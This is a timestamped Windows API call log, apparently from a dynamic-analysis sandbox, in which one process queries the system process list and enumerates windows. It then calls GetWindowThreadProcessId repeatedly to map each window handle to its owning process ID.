	[0587.261] GetExitCodeProcess (in: hProcess=0x1d4, lpExitCode=0xedc78 | out: lpExitCode=0xedc78*=0x103) returned 1
	[0587.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c5b088, Length=0x20000, ResultLength=0xedc40 | out: SystemInformation=0x12c5b088, ResultLength=0xedc40*=0x35488) returned 0xc0000004
	[0587.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c7b0b8, Length=0x37c88, ResultLength=0xedc40 | out: SystemInformation=0x12c7b0b8, ResultLength=0xedc40*=0x35488) returned 0x0
	[0589.315] EnumWindows (lpEnumFunc=0x2a166ac, lParam=0x0) 
	[0596.419] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0596.548] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x558
	[0598.743] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0599.255] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0600.678] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0601.229] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x538
	[0601.231] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0601.232] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x778
	[0601.232] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x778
	[0603.335] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0606.159] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0607.222] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0609.265] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0611.470] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0611.574] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0612.851] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0612.853] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0614.073] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x460
	[0619.293] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0619.905] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0619.908] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x3a8
	[0620.959] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1bd0
	[0621.434] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1bfc
	[0621.439] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1a78
	[0621.442] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1b90
	[0621.445] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1b04
	[0621.446] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1b34
	[0622.788] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1b64
	[0622.793] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1bb0
	[0622.797] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1acc
	[0622.800] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1a2c
	[0622.803] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x19a8
	[0622.804] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1944
	[0622.806] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x18c8
	[0622.806] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x18ac
	[0624.672] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x18ec
	[0625.392] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1898
	[0625.637] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xc98
	[0627.858] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x153c
	[0629.714] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1808
	[0629.721] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x12a4
	[0629.724] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1740
	[0629.727] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x16c4
	[0631.375] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1820
	[0631.375] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x16ac
	[0631.375] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1858
	[0631.375] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1664
	[0631.375] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x10b4
	[0631.375] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x10ac
	[0631.375] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x10ec
	[0631.376] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1068
	[0631.376] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x17e0
	[0631.376] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x102c
	[0631.376] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x17a4
	[0631.376] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1050
	[0631.376] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1694
	[0631.376] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1770
	[0631.377] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1720
	[0631.377] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x165c
	[0631.377] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1578
	[0631.377] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x16c0
	[0631.377] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x161c
	[0631.377] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1638
	[0631.377] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x15c8
	[0631.377] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1554
	[0631.378] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1674
	[0631.378] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1520
	[0631.378] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x14bc
	[0631.378] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xf8c
	[0631.378] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xe9c
	[0631.378] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1434
	[0631.378] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x14ec
	[0631.378] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xfcc
	[0631.379] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x12ac
	[0631.379] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1484
	[0631.379] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x934
	[0631.379] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xc0c
	[0631.379] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xb08
	[0631.379] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x948
	[0631.379] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1178
	[0631.379] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x13e0
	[0631.380] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xcd0
	[0631.380] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x13fc
	[0631.380] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xdc8
	[0631.380] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xc18
	[0631.380] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xc2c
	[0631.380] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xa1c
	[0631.380] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1244
	[0631.381] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xdb0
	[0631.381] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1398
	[0631.381] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1358
	[0631.381] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1370
	[0631.381] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1340
	[0631.381] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x130c
	[0631.381] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x12c0
	[0631.381] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x12e4
	[0631.382] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1270
	[0631.382] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1298
	[0631.382] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x120c
	[0631.382] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x122c
	[0631.382] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x11c4
	[0631.382] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x11b0
	[0631.382] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1188
	[0631.383] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1148
	[0631.383] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1160
	[0631.383] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x10fc
	[0631.383] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xe34
	[0631.383] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xea4
	[0631.383] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x514
	[0631.383] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xe48
	[0631.383] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xbc8
	[0631.383] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xdf8
	[0631.383] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x318
	[0631.384] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xcac
	[0631.384] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x8bc
	[0631.384] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xf9c
	[0631.384] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xf48
	[0631.384] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xe40
	[0631.384] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xecc
	[0631.384] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xeb8
	[0631.384] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xe80
	[0631.384] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xe98
	[0631.384] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xe60
	[0631.384] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xee4
	[0631.385] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xf00
	[0631.385] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xdf0
	[0631.385] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xe1c
	[0631.385] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xdd0
	[0631.385] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xd94
	[0631.385] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xd74
	[0631.385] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xd00
	[0631.385] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xcd8
	[0631.385] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xc84
	[0631.385] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xca4
	[0631.386] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xc64
	[0631.386] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xc24
	[0631.386] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xb84
	[0631.386] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xbac
	[0631.386] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x384
	[0631.386] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xab8
	[0631.386] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x33c
	[0631.386] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xa44
	[0631.386] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xa64
	[0631.387] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x8a8
	[0631.387] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xaf0
	[0631.387] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x88c
	[0631.387] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xb04
	[0631.387] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x910
	[0631.387] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x230
	[0631.387] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xac0
	[0631.387] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xab4
	[0631.388] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xaac
	[0631.388] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x3d0
	[0631.388] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x978
	[0631.388] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xa7c
	[0631.388] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x59c
	[0631.388] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xa88
	[0631.388] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xa6c
	[0631.388] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xa68
	[0631.389] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x9f8
	[0631.389] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xa04
	[0631.389] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x924
	[0631.389] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x8dc
	[0631.389] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x7dc
	[0631.389] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x768
	[0631.389] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x764
	[0631.389] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x820
	[0631.389] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x810
	[0631.390] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x794
	[0631.390] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x83c
	[0631.390] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x7ac
	[0631.390] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xb44
	[0631.390] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xb5c
	[0631.390] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x838
	[0631.390] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.390] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.390] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.390] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.391] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.391] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.391] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.391] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.391] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x818
	[0631.391] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x5b8
	[0631.391] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x494
	[0631.391] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1ec
	[0631.391] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x440
	[0631.391] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x7e8
	[0631.391] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x730
	[0631.391] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x2c8
	[0631.392] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x31c
	[0631.392] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x330
